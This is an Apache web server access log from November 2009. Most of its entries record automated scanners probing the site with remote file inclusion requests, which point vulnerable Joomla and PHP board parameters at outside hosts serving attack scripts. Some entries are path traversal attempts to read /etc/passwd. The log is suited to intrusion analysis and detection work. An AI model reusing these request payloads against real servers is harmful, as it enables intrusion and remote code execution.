77.221.130.17 - - [13/Nov/2009:02:06:50 -0500] "GET /index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:06:50 -0500] "GET /logs/access_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:06:50 -0500] "GET /logs/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:06:51 -0500] "GET /index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:06:52 -0500] "GET /logs/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:06:52 -0500] "GET /logs/access_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
174.143.155.52 - - [13/Nov/2009:02:07:41 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:02:07:42 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:02:07:46 -0500] "GET /logs/error_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:02:07:47 -0500] "GET /logs/error_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
82.98.145.78 - - [13/Nov/2009:02:07:56 -0500] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:07:56 -0500] "GET /e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:07:56 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:07:57 -0500] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:12:10 -0500] "GET //components/com_joomlaboard/file_upload.php?sbp=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:12:10 -0500] "GET /logs/access_log.Q109051000%20%20//components/com_joomlaboard/file_upload.php?sbp=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:12:10 -0500] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:02:12:17 -0500] "GET /logs/index3.php?test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
67.205.67.241 - - [13/Nov/2009:02:12:18 -0500] "GET /index3.php?test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
78.159.115.249 - - [13/Nov/2009:02:12:32 -0500] "GET /logs/error_log.Q109051000%20%20//components/com_joomlaboard/file_upload.php?sbp=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:02:13:08 -0500] "GET /logs/access_log.Q109092200//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:14:33 -0500] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:14:33 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:14:33 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:14:37 -0500] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:25 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:25 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:25 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:26 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:26 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:26 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:34 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:17:35 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:17:36 -0500] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:17:36 -0500] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:18:25 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:18:25 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:18:25 -0500] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:02:18:28 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.176.229.7 - - [13/Nov/2009:02:19:00 -0500] "GET /logs/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:00 -0500] "GET /logs/access_log.Q109073100%20%20/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:00 -0500] "GET /index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:00 -0500] "GET /logs/access_log.Q109053000%20%20/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:03 -0500] "GET /logs/error_log.Q109070400/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:03 -0500] "GET /index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:03 -0500] "GET /logs/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:19:08 -0500] "GET /logs/error_log.Q109060900/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:19:41 -0500] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:19:41 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:02:19:41 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:20:18 -0500] "GET /skin/ggaggo_pds/setup.php?dir=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:20:18 -0500] "GET /logs/skin/ggaggo_pds/setup.php?dir=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:02:20:18 -0500] "GET /logs/access_log.Q109102600%20%20/skin/ggaggo_pds/setup.php?dir=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:02:20:28 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:28 -0500] "GET /logs/access_log.Q109091500/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:28 -0500] "GET /logs/access_log.Q109091000/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:28 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
81.176.229.7 - - [13/Nov/2009:02:20:51 -0500] "GET /logs/access_log.Q109053000/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:20:51 -0500] "GET /logs/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:20:51 -0500] "GET /index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:02:20:52 -0500] "GET /logs/access_log.Q109080200/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:52 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:52 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:02:20:53 -0500] "GET /logs/access_log.Q109052100/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
81.176.229.7 - - [13/Nov/2009:02:20:54 -0500] "GET /logs/access_log.Q109073100/index1.php?x=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:20:55 -0500] "GET /index.phpmain.php?x=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:20:55 -0500] "GET /logs/access_log.Q109062200/index.phpmain.php?x=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:02:20:55 -0500] "GET /logs/index.phpmain.php?x=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
220.181.7.127 - - [13/Nov/2009:02:21:06 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.50.85.59 - - [13/Nov/2009:02:21:53 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.50.85.59 - - [13/Nov/2009:02:21:53 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:03 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:03 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:03 -0500] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:03 -0500] "GET /logs/access_log.Q109101000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
123.125.66.119 - - [13/Nov/2009:02:23:10 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.251.28.214 - - [13/Nov/2009:02:23:17 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:17 -0500] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:17 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:23:18 -0500] "GET /logs/access_log.Q109101000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:24:07 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:24:08 -0500] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:24:08 -0500] "GET /logs/access_log.Q109101000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:02:24:08 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.68.145 - - [13/Nov/2009:02:24:06 -0500] "GET /logs/access_log.Q109052500 HTTP/1.1" 200 2746180 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.182.62.35 - - [13/Nov/2009:02:25:40 -0500] "GET /logs/access_log.Q109060600%20/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
218.38.54.35 - - [13/Nov/2009:02:30:15 -0500] "GET /skin/ggambo4100_gallery2/list_main.php/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:02:30:15 -0500] "GET /logs/skin/ggambo4100_gallery2/list_main.php/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:02:30:15 -0500] "GET /logs/access_log.Q109092500/skin/ggambo4100_gallery2/list_main.php/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:30:53 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:30:53 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:30:53 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:08 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:09 -0500] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:09 -0500] "GET /logs/access_log.Q109101000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:09 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:31:21 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:31:21 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:02:31:21 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:02:31:27 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:02:31:27 -0500] "GET /logs/access_log.Q109101000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:02:31:27 -0500] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:02:31:27 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:31 -0500] "GET /logs/access_log.Q109101000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:31 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:31 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:31:31 -0500] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
85.13.138.104 - - [13/Nov/2009:02:32:40 -0500] "GET /?sourcedir=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 409 "-" "-"
85.13.138.104 - - [13/Nov/2009:02:32:48 -0500] "GET /?sourcedir=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 409 "-" "-"
119.122.75.54 - - [13/Nov/2009:02:34:18 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:34:18 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:34:28 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:34:28 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
213.171.225.234 - - [13/Nov/2009:02:34:31 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:02:34:31 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:02:34:31 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:02:34:50 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:02:34:50 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:02:34:50 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:35:20 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:35:20 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:02:35:20 -0500] "GET /logs/error_log.Q109070400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.29.90.110 - - [13/Nov/2009:02:35:43 -0500] "GET /logs/access_log.Q109071100/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.29.90.110 - - [13/Nov/2009:02:35:43 -0500] "GET /logs/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
87.106.218.11 - - [13/Nov/2009:02:35:50 -0500] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
87.106.218.11 - - [13/Nov/2009:02:35:50 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
87.106.218.11 - - [13/Nov/2009:02:35:50 -0500] "GET //include/footer.php?_path[counter]=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
